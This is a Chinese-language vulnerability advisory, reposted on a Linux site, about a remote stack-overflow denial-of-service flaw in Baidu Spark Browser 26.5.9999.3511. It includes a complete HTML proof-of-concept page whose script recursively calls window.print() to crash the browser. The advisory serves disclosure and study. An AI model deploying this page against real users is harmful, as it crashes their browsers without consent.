当前位置: > Linux安全 >

Baidu Spark浏览器栈溢出拒绝服务漏洞

时间:2014-07-08 16:08来源:linux.it.net.cn 作者:IT网

发布日期:2014-03-10
更新日期:2014-07-02

受影响系统:
Baidu Spark Browser 26.5.9999.3511
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 68288
 
Baidu Spark浏览器是基于Chromium的Web浏览器。
 
Baidu Spark Browser 26.5.9999.3511及其他版本在实现上存在远程拒绝服务漏洞,成功利用后可允许攻击者使受影响浏览器崩溃,导致拒绝服务。
 
<*来源:Gjoko 'LiquidWorm' Krstic
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
 <title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
 <body bgcolor="#50708C">
 <center>
 <p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
 <button onClick=crash()>Execute!</button>
 </center>
 <script>
 function crash(){
  window.print();
  crash();
 }
 </script>
 </body>
 </html>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Baidu
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://en.browser.baidu.com/

(责任编辑:IT)
------分隔线----------------------------
栏目列表
推荐内容